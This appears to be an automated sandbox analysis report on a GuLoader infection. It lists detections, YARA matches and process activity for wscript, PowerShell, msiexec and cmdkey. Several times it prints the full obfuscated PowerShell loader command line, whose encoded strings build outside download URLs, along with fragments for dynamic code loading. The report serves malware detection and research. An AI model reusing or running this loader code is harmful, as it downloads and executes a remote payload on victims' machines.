          Source: Binary string: wntdll.pdb source: msiexec.exe, msiexec.exe, 0000000A.00000003.3061903558.0000000021F0C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.3059333142.0000000021D5C000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 0000000C.00000002.3468299948.000000000376E000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 0000000C.00000003.3168090406.000000000326A000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 0000000C.00000003.3170420691.000000000341E000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 0000000C.00000002.3468299948.00000000035D0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2665678628.0000000008710000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: cmdkey.pdb source: msiexec.exe, 0000000A.00000003.3126312023.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.3126442250.0000000000A9E000.00000004.00000020.00020000.00000000.sdmp, GJFjqeGumqI.exe, 0000000B.00000002.3467221616.0000000000DC8000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          VBScript performs obfuscated calls to suspicious functions
          Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell " <#Versfods Pudser Ringmrknings Gonitis Recuperability Saggio Doceret #>;$Homoplasy='Stenkulsnaftas';", "0")
          Yara detected GuLoader
          Source: Yara matchFile source: 0000000A.00000002.3167965625.00000000054F8000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2667645676.000000000A5A8000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2667370891.0000000008940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2374208348.0000019E36F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2640784157.0000000005C28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Found suspicious powershell code related to unpacking or dynamic code loading
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Ddsspiral)$glOBal:TYpeSITUAtIoner = [SYsTEm.TExt.EnCoDINg]::AsCiI.gEtSTrinG($MUSkElmAnd)$glOBAl:OutBId=$tYpESItuatIonER.sUbstRinG($eRHOLDncoNcEIVAblY,$RensekrEMer)<#Etiketteret Usual
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Fuldblodsopdrtterne $currachs $Filtypers), (Parachuter @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Accumulable = [AppDomain]::CurrentDomain.GetAssembli
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Flappy)), $Outfeed).DefineDynamicModule($Genskabende, $false).DefineType($liljernes, $canyonens, [System.MulticastDelegate])$Apositia.
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Ddsspiral)$glOBal:TYpeSITUAtIoner = [SYsTEm.TExt.EnCoDINg]::AsCiI.gEtSTrinG($MUSkElmAnd)$glOBAl:OutBId=$tYpESItuatIonER.sUbstRinG($eRHOLDncoNcEIVAblY,$RensekrEMer)<#Etiketteret Usual
          Suspicious powershell command line found
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Versfods Pudser Ringmrknings Gonitis Recuperability Saggio Doceret #>;$Homoplasy='Stenkulsnaftas';<#Rejicer Amanuensiser Manticory #>;$Feminisere=$Oversalts+$host.UI; function Naturvrdi($unmannerliness){If ($Feminisere) {$varens++;}$Uenigst=$Etymologiserendes+$unmannerliness.'Length'-$varens; for( $Erhold=4;$Erhold -lt $Uenigst;$Erhold+=5){$Generationsprojekters=$Erhold;$Lucuma+=$unmannerliness[$Erhold];$Bergensisk='Costively';}$Lucuma;}function Furnage($Lokummet){ & ($Brneballet) ($Lokummet);}$Prereceived=Naturvrdi 'MaliM atio Hi,zSp.liFibrlBagmlTilkaExte/Rytt ';$Prereceived+=Naturvrdi ' Kyl5R,ek.Bran0neut Fo b(bereWAfm i QuanFl.ld BrsoEstawUnlusC ch AppeNSpheT et Howd1Enek0Him .Flle0 tje;Repr Oxy WC diiSkadnBesk6Abor4Call;Fors FastxStem6gav.4Phan;St.u Prodr KiovGdni: Ben1Grun3V sp1Su t.Land0St r)M,sc SupeGHandeCatac.uffkR cho Vau/Su c2 Car0 amp1Posi0Zirk0reg.1Fist0D ba1Vide F.anFSurviSengrMa,keRutef edeoEscaxLe b/Tild1incu3Para1Inde.Tryp0Brod ';$Teosofis=Naturvrdi 'M.deuSchnsMicrEbeboRSprn-TillaSandG hagE S.eNOpgatWaba ';$Soybean=Naturvrdi 'Reveh Fort.quat.usqpKultsPros:Pref/ Ko./UndewKat.wJazzw Uda.Sh,pgVermrP euoStoeuUdenpTh,or ambi S ea BrumPsyc.Ud ycPaapoPatemCopr/Fit.K P roiri,a ReplAfhji emtFeasiTermougr nLkkeeProprcyst.ComppUnsorBerrxId n>ArabhEmbltSarotKommp frssanti: Ent/Pu s/kalabS virDetau emtMo.sa.ent. iscp OlilMode/Be eKLeptoTe aaKruslcur.iFetct,araiEteroPourn OkkeCha rSi,h.CocrpSprkrtankx Mer>behnhlagdtRevatprofpSludsReso:Brug/Prop/ GeopOptar UndoPrepmTaviePrecnOps,t Lr eBerer dob.Actir IvesHaug/IrreKKineoPneua failTri,i RhatAnkei AveoSlatnveroeFeudrVeli.Sammpdownr .eixSnke ';$Knulling=Naturvrdi 'Geom>Bagg ';$Brneballet=Naturvrdi 'Hun iIncoeFri X Svu ';$Deposito='Kalkudsivning';$Mantelet70='\spgelseshistories.Hov';Furnage (Naturvrdi 'Wo l$ RecgR maLsab OHersBParaAHelll Ind:LotaPSpisR AutEOpskd ,irIOvercFrs,AplanBMainlFiskePres=Trai$ FrieLat nBrunVDumb:Ban a Bo pHelmpPr dDi aiA.ntrtTor A.arr+Cloa$dioxmMechADiviNUdd Ttr,ne dlglOptiEDybstR ne7Lnko0Tegn ');Furnage (Naturvrdi 'Smas$PercGO erLSau OElanBHjemAT apLSkyg:Advio Oksp No.tHydrRUnfevU unL cceUdsvt Opp2E cr2Fors7Laud= H.r$ruelsI dvoOverYSoldBKorsEPunca prkN Abl.RvenStlpeptypolBetoIForetPaaf(,ekn$Unq kPutrnKittu klaLNondl.nami.oncnFibrG Vid)El e ');Furnage (Naturvrdi 'Stan[ CorNI che,angtOv r.TestSKo te ApprOm gV ridiAppecKrnieE tepBesgoAkmui Batn MiltUkrlM bacaSlannOphoaPolyG GkkeColpRHydr] ood:V gr: Ba SHogtEGramCSo oU,avnr.resiUndeTSympyYumaPI,terSkriO .agtSkreoU tac foroHammlPa.v Asc=Oplg Voic[SwilN.ilbePenkt in .Jap,S NuleImdeC dpaUUrsirUnfaiMissTDoo yInfiP T.ert ndOUndeT m,roCrazc K.lOCounLMou TReneYRuswP,ddeE yn]Neur:John:PaattPlumLR,acsEfte1Inte2F.os ');$Soybean=$Optrvlet227[0];$Afbrnde=(Naturvrdi 'Frek$ Un gUr nl BaloTetoBLimnASkolLEcze: .hikHeteaAwaksEnwik ForEBrutLPhonoKenit NegTAfb,eEarlrR.teNFor,EStubSReko=taenn Ceme Te WPart-Ve.dO
          Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Versfods Pudser Ringmrknings Gonitis Recuperability Saggio Doceret #>;$Homoplasy='Stenkulsnaftas';<#Rejicer Amanuensiser Manticory #>;$Feminisere=$Oversalts+$host.UI; function Naturvrdi($unmannerliness){If ($Feminisere) {$varens++;}$Uenigst=$Etymologiserendes+$unmannerliness.'Length'-$varens; for( $Erhold=4;$Erhold -lt $Uenigst;$Erhold+=5){$Generationsprojekters=$Erhold;$Lucuma+=$unmannerliness[$Erhold];$Bergensisk='Costively';}$Lucuma;}function Furnage($Lokummet){ & ($Brneballet) ($Lokummet);}$Prereceived=Naturvrdi 'MaliM atio Hi,zSp.liFibrlBagmlTilkaExte/Rytt ';$Prereceived+=Naturvrdi ' Kyl5R,ek.Bran0neut Fo b(bereWAfm i QuanFl.ld BrsoEstawUnlusC ch AppeNSpheT et Howd1Enek0Him .Flle0 tje;Repr Oxy WC diiSkadnBesk6Abor4Call;Fors FastxStem6gav.4Phan;St.u Prodr KiovGdni: Ben1Grun3V sp1Su t.Land0St r)M,sc SupeGHandeCatac.uffkR cho Vau/Su c2 Car0 amp1Posi0Zirk0reg.1Fist0D ba1Vide F.anFSurviSengrMa,keRutef edeoEscaxLe b/Tild1incu3Para1Inde.Tryp0Brod ';$Teosofis=Naturvrdi 'M.deuSchnsMicrEbeboRSprn-TillaSandG hagE S.eNOpgatWaba ';$Soybean=Naturvrdi 'Reveh Fort.quat.usqpKultsPros:Pref/ Ko./UndewKat.wJazzw Uda.Sh,pgVermrP euoStoeuUdenpTh,or ambi S ea BrumPsyc.Ud ycPaapoPatemCopr/Fit.K P roiri,a ReplAfhji emtFeasiTermougr nLkkeeProprcyst.ComppUnsorBerrxId n>ArabhEmbltSarotKommp frssanti: Ent/Pu s/kalabS virDetau emtMo.sa.ent. iscp OlilMode/Be eKLeptoTe aaKruslcur.iFetct,araiEteroPourn OkkeCha rSi,h.CocrpSprkrtankx Mer>behnhlagdtRevatprofpSludsReso:Brug/Prop/ GeopOptar UndoPrepmTaviePrecnOps,t Lr eBerer dob.Actir IvesHaug/IrreKKineoPneua failTri,i RhatAnkei AveoSlatnveroeFeudrVeli.Sammpdownr .eixSnke ';$Knulling=Naturvrdi 'Geom>Bagg ';$Brneballet=Naturvrdi 'Hun iIncoeFri X Svu ';$Deposito='Kalkudsivning';$Mantelet70='\spgelseshistories.Hov';Furnage (Naturvrdi 'Wo l$ RecgR maLsab OHersBParaAHelll Ind:LotaPSpisR AutEOpskd ,irIOvercFrs,AplanBMainlFiskePres=Trai$ FrieLat nBrunVDumb:Ban a Bo pHelmpPr dDi aiA.ntrtTor A.arr+Cloa$dioxmMechADiviNUdd Ttr,ne dlglOptiEDybstR ne7Lnko0Tegn ');Furnage (Naturvrdi 'Smas$PercGO erLSau OElanBHjemAT apLSkyg:Advio Oksp No.tHydrRUnfevU unL cceUdsvt Opp2E cr2Fors7Laud= H.r$ruelsI dvoOverYSoldBKorsEPunca prkN Abl.RvenStlpeptypolBetoIForetPaaf(,ekn$Unq kPutrnKittu klaLNondl.nami.oncnFibrG Vid)El e ');Furnage (Naturvrdi 'Stan[ CorNI che,angtOv r.TestSKo te ApprOm gV ridiAppecKrnieE tepBesgoAkmui Batn MiltUkrlM bacaSlannOphoaPolyG GkkeColpRHydr] ood:V gr: Ba SHogtEGramCSo oU,avnr.resiUndeTSympyYumaPI,terSkriO .agtSkreoU tac foroHammlPa.v Asc=Oplg Voic[SwilN.ilbePenkt in .Jap,S NuleImdeC dpaUUrsirUnfaiMissTDoo yInfiP T.ert ndOUndeT m,roCrazc K.lOCounLMou TReneYRuswP,ddeE yn]Neur:John:PaattPlumLR,acsEfte1Inte2F.os ');$Soybean=$Optrvlet227[0];$Afbrnde=(Naturvrdi 'Frek$ Un gUr nl BaloTetoBLimnASkolLEcze: .hikHeteaAwaksEnwik ForEBrutLPhonoKenit NegTAfb,eEarlrR.teNFor,EStubSReko=taenn Ceme Te WPart-Ve.dO
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Versfods Pudser Ringmrknings Gonitis Recuperability Saggio Doceret #>;$Homoplasy='Stenkulsnaftas';<#Rejicer Amanuensiser Manticory #>;$Feminisere=$Oversalts+$host.UI; function Naturvrdi($unmannerliness){If ($Feminisere) {$varens++;}$Uenigst=$Etymologiserendes+$unmannerliness.'Length'-$varens; for( $Erhold=4;$Erhold -lt $Uenigst;$Erhold+=5){$Generationsprojekters=$Erhold;$Lucuma+=$unmannerliness[$Erhold];$Bergensisk='Costively';}$Lucuma;}function Furnage($Lokummet){ & ($Brneballet) ($Lokummet);}$Prereceived=Naturvrdi 'MaliM atio Hi,zSp.liFibrlBagmlTilkaExte/Rytt ';$Prereceived+=Naturvrdi ' Kyl5R,ek.Bran0neut Fo b(bereWAfm i QuanFl.ld BrsoEstawUnlusC ch AppeNSpheT et Howd1Enek0Him .Flle0 tje;Repr Oxy WC diiSkadnBesk6Abor4Call;Fors FastxStem6gav.4Phan;St.u Prodr KiovGdni: Ben1Grun3V sp1Su t.Land0St r)M,sc SupeGHandeCatac.uffkR cho Vau/Su c2 Car0 amp1Posi0Zirk0reg.1Fist0D ba1Vide F.anFSurviSengrMa,keRutef edeoEscaxLe b/Tild1incu3Para1Inde.Tryp0Brod ';$Teosofis=Naturvrdi 'M.deuSchnsMicrEbeboRSprn-TillaSandG hagE S.eNOpgatWaba ';$Soybean=Naturvrdi 'Reveh Fort.quat.usqpKultsPros:Pref/ Ko./UndewKat.wJazzw Uda.Sh,pgVermrP euoStoeuUdenpTh,or ambi S ea BrumPsyc.Ud ycPaapoPatemCopr/Fit.K P roiri,a ReplAfhji emtFeasiTermougr nLkkeeProprcyst.ComppUnsorBerrxId n>ArabhEmbltSarotKommp frssanti: Ent/Pu s/kalabS virDetau emtMo.sa.ent. iscp OlilMode/Be eKLeptoTe aaKruslcur.iFetct,araiEteroPourn OkkeCha rSi,h.CocrpSprkrtankx Mer>behnhlagdtRevatprofpSludsReso:Brug/Prop/ GeopOptar UndoPrepmTaviePrecnOps,t Lr eBerer dob.Actir IvesHaug/IrreKKineoPneua failTri,i RhatAnkei AveoSlatnveroeFeudrVeli.Sammpdownr .eixSnke ';$Knulling=Naturvrdi 'Geom>Bagg ';$Brneballet=Naturvrdi 'Hun iIncoeFri X Svu ';$Deposito='Kalkudsivning';$Mantelet70='\spgelseshistories.Hov';Furnage (Naturvrdi 'Wo l$ RecgR maLsab OHersBParaAHelll Ind:LotaPSpisR AutEOpskd ,irIOvercFrs,AplanBMainlFiskePres=Trai$ FrieLat nBrunVDumb:Ban a Bo pHelmpPr dDi aiA.ntrtTor A.arr+Cloa$dioxmMechADiviNUdd Ttr,ne dlglOptiEDybstR ne7Lnko0Tegn ');Furnage (Naturvrdi 'Smas$PercGO erLSau OElanBHjemAT apLSkyg:Advio Oksp No.tHydrRUnfevU unL cceUdsvt Opp2E cr2Fors7Laud= H.r$ruelsI dvoOverYSoldBKorsEPunca prkN Abl.RvenStlpeptypolBetoIForetPaaf(,ekn$Unq kPutrnKittu klaLNondl.nami.oncnFibrG Vid)El e ');Furnage (Naturvrdi 'Stan[ CorNI che,angtOv r.TestSKo te ApprOm gV ridiAppecKrnieE tepBesgoAkmui Batn MiltUkrlM bacaSlannOphoaPolyG GkkeColpRHydr] ood:V gr: Ba SHogtEGramCSo oU,avnr.resiUndeTSympyYumaPI,terSkriO .agtSkreoU tac foroHammlPa.v Asc=Oplg Voic[SwilN.ilbePenkt in .Jap,S NuleImdeC dpaUUrsirUnfaiMissTDoo yInfiP T.ert ndOUndeT m,roCrazc K.lOCounLMou TReneYRuswP,ddeE yn]Neur:John:PaattPlumLR,acsEfte1Inte2F.os ');$Soybean=$Optrvlet227[0];$Afbrnde=(Naturvrdi 'Frek$ Un gUr nl BaloTetoBLimnASkolLEcze: .hikHeteaAwaksEnwik ForEBrutLPhonoKenit NegTAfb,eEarlrR.teNFor,EStubSReko=taenn Ceme Te WPart-Ve.dOJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848A70974 push E95ABDD0h; ret 4_2_00007FF848A709C9
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848B466A3 push es; retf 4_2_00007FF848B466D2
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848B463BD push es; retf 4_2_00007FF848B463EA
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848B4637F push es; retf 4_2_00007FF848B46380
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848B46473 push es; retf 4_2_00007FF848B464A2
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0490370F pushad ; iretd 6_2_04903749
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220F09AD push ecx; mov dword ptr [esp], ecx10_2_220F09B6
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeCode function: 11_2_0363AB27 push ss; ret 11_2_0363AB28
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeCode function: 11_2_03636A68 push 0000002Dh; ret 11_2_03636A7A
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeCode function: 11_2_03631A9D push edx; retf 11_2_03631AA6
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeCode function: 11_2_03621006 push ecx; ret 11_2_03621007
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeCode function: 11_2_03624706 push FFFFFF9Ch; ret 11_2_03624708
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeCode function: 11_2_036296BC push ss; ret 11_2_036296DD
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeCode function: 11_2_0362345C push ebp; iretd 11_2_0362351F
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exeCode function: 11_2_03630CC3 push eax; ret 11_2_03630CDE
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
